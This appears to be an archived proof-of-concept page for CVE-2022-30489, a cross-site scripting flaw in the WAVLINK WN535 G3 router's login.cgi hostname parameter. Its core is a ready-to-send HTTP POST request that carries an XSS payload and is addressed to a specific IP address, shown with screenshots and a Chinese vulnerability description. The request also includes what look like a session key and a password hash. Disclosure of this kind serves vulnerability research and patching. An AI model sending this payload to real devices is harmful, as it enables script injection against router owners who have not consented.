Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-30489 PoC — WAVLINK WN535 G3 跨站脚本漏洞

Source
Associated Vulnerability
Title:WAVLINK WN535 G3 跨站脚本漏洞 (CVE-2022-30489)
Description:WAVLINK WN535 G3是中国WAVLINK公司的一个无线路由器。 WAVLINK WN535 G3 存在安全漏洞,该漏洞源于/cgi-bin/login.cgi 中的主机名参数缺少过滤和转义,攻击者利用该漏洞可进行跨站脚本攻击。
Readme
# WAVLINK   WN535G3 POST XSS

# Use CVE-2022-30489

![image](https://user-images.githubusercontent.com/72059221/167049389-760be75c-6d84-45f6-a8aa-ff4e7e05241b.png)



![image](https://user-images.githubusercontent.com/72059221/167049403-82f98ff0-6774-4a6f-99f4-f712824c765b.png)



![image](https://user-images.githubusercontent.com/72059221/167049414-0eceb092-33b3-4bf6-93af-1e080c4fb314.png)


## PAYLOAD

```
POST /cgi-bin/login.cgi HTTP/1.1 Host: 98.127.66.193 Content-Length: 255 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://98.127.66.193 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://98.127.66.193/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close newUI=1&page=login&username=admin&langChange=0&ipaddr=171.113.240.243&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</><>alert(1)</>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn
```



![image](https://user-images.githubusercontent.com/72059221/167049430-31952408-b40b-4263-a16f-41a3634540bf.png)


![image](https://user-images.githubusercontent.com/72059221/167049442-fc47e4a5-ec10-4feb-9488-70b86c07ec8c.png)


File Snapshot

[4.0K] /data/pocs/53ce636b6e85a1c5b61c790781d6dadb32ff9acd └── [1.5K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.